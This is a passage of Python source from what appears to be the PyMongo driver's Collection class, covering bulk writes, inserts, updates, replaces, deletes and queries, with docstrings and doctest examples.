False,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(
self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_unordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_ordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False, session=None):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_list("requests", requests)
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
try:
request._add_to_bulk(blk)
except AttributeError:
raise TypeError("%r is not a valid request" % (request,))
write_concern = self._write_concern_for(session)
bulk_api_result = blk.execute(write_concern, session)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, op_id,
bypass_doc_val, func, *args):
"""Internal legacy unacknowledged write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if bypass_doc_val and sock_info.max_wire_version >= 4:
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
args = args + (sock_info.compression_context,)
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(rqst_id, msg, max_size, False)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val,
session):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
def _insert_command(session, sock_info, retryable_write):
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_INSERT.
return self._legacy_write(
sock_info, 'insert', command, op_id,
bypass_doc_val, message.insert, self.__full_name,
[doc], check_keys, False, write_concern.document, False,
self.__write_response_codec_options)
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
check_keys=check_keys,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
self.__database.client._retryable_write(
acknowledged, _insert_command, session)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False, session=None):
"""Internal insert helper."""
if isinstance(docs, abc.Mapping):
return self._insert_one(
docs, ordered, check_keys, manipulate, write_concern, op_id,
bypass_doc_val, session)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
write_concern = write_concern or self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_doc_val)
blk.ops = [(message._INSERT, doc) for doc in gen()]
try:
blk.execute(write_concern, session=session)
except BulkWriteError as bwe:
_raise_last_error(bwe.details)
return ids
def insert_one(self, document, bypass_document_validation=False,
session=None):
"""Insert a single document.
>>> db.test.count_documents({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
write_concern = self._write_concern_for(session)
return InsertOneResult(
self._insert(document,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
session=session),
write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False, session=None):
"""Insert an iterable of documents.
>>> db.test.count_documents({})
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count_documents({})
2
:Parameters:
          - `documents`: An iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, abc.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
write_concern = self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(write_concern, session=session)
return InsertManyResult(inserted_ids, write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None, retryable_write=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
collation = validate_collation_or_none(collation)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
update_doc = SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
update_doc['collation'] = collation
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use array_filters.')
elif not acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged writes.')
else:
update_doc['arrayFilters'] = array_filters
command = SON([('update', self.name),
('ordered', ordered),
('updates', [update_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, False, write_concern.document,
check_keys, self.__write_response_codec_options)
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write).copy()
_check_write_command_response(result)
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
if not acknowledged:
return None
return result
def _update_retryable(
self, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None):
"""Internal update / replace helper."""
def _update(session, sock_info, retryable_write):
return self._update(
sock_info, criteria, document, upsert=upsert,
check_keys=check_keys, multi=multi, manipulate=manipulate,
write_concern=write_concern, op_id=op_id, ordered=ordered,
bypass_doc_val=bypass_doc_val, collation=collation,
array_filters=array_filters, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_update, session)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False, collation=None,
session=None):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, replacement, upsert,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, session=session),
write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False,
collation=None, array_filters=None, session=None):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added the `array_filters` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def update_many(self, filter, update, upsert=False, array_filters=None,
bypass_document_validation=False, collation=None,
session=None):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation` (optional): If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``array_filters`` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False, multi=True,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def drop(self, session=None):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
.. versionchanged:: 3.7
:meth:`drop` now respects this :class:`Collection`'s :attr:`write_concern`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
dbo.drop_collection(self.__name, session=session)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None, retryable_write=False):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
delete_doc = SON([('q', criteria),
('limit', int(not multi))])
collation = validate_collation_or_none(collation)
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
delete_doc['collation'] = collation
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [delete_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, op_id,
False, message.delete, self.__full_name, criteria,
False, write_concern.document,
self.__write_response_codec_options,
int(not multi))
# Delete command.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
return result
def _delete_retryable(
self, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None):
"""Internal delete helper."""
def _delete(session, sock_info, retryable_write):
return self._delete(
sock_info, criteria, multi,
write_concern=write_concern, op_id=op_id, ordered=ordered,
collation=collation, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_delete, session)
def delete_one(self, filter, collation=None, session=None):
"""Delete a single document matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count_documents({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, False,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def delete_many(self, filter, collation=None, session=None):
"""Delete one or more documents matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count_documents({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, True,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
>>> collection.find_one(max_time_ms=100)
"""
if (filter is not None and not
isinstance(filter, abc.Mapping)):
filter = {"_id": filter}
cursor = self.find(filter, *args, **kwargs)
for result in cursor.limit(-1):
return result
return None
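    # Usage sketch, kept in comments so the module stays importable. Names are
    # illustrative and assume an existing Collection ``coll`` and an ObjectId ``oid``:
    #
    #     doc = coll.find_one({'x': 1})                  # filter as a mapping
    #     doc = coll.find_one(oid)                       # non-mapping -> {'_id': oid}
    #     doc = coll.find_one({'x': 1}, {'x': True, '_id': False})  # with a projection
    #     if doc is None:
    #         pass  # no matching document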
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `return_key` (optional): If True, return only the index keys in
each document.
- `show_record_id` (optional): If True, adds a field ``$recordId`` in
each document with the storage engine's internal record identifier.
- `snapshot` (optional): **DEPRECATED** - If True, prevents the
cursor from returning a document more than once because of an
intervening write operation.
- `hint` (optional): An index, in the same format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.hint` on the cursor to tell Mongo the
proper index to use for the query.
- `max_time_ms` (optional): Specifies a time limit for a query
operation. If the specified time is exceeded, the operation will be
aborted and :exc:`~pymongo.errors.ExecutionTimeout` is raised. Pass
this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_time_ms` on the cursor.
- `max_scan` (optional): **DEPRECATED** - The maximum number of
documents to scan. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_scan` on the cursor.
- `min` (optional): A list of field, limit pairs specifying the
inclusive lower bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.min` on the cursor.
- `max` (optional): A list of field, limit pairs specifying the
exclusive upper bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max` on the cursor.
- `comment` (optional): A string or document. Pass this as an
alternative to calling :meth:`~pymongo.cursor.Cursor.comment` on the
cursor.
- `modifiers` (optional): **DEPRECATED** - A dict specifying
additional MongoDB query modifiers. Use the keyword arguments listed
above instead.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.7
Deprecated the `snapshot` option, which is deprecated in MongoDB
3.6 and removed in MongoDB 4.0.
Deprecated the `max_scan` option. Support for this option is
deprecated in MongoDB 4.0. Use `max_time_ms` instead to limit server
side execution time.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.5
Added the options `return_key`, `show_record_id`, `snapshot`,
`hint`, `max_time_ms`, `max_scan`, `min`, `max`, and `comment`.
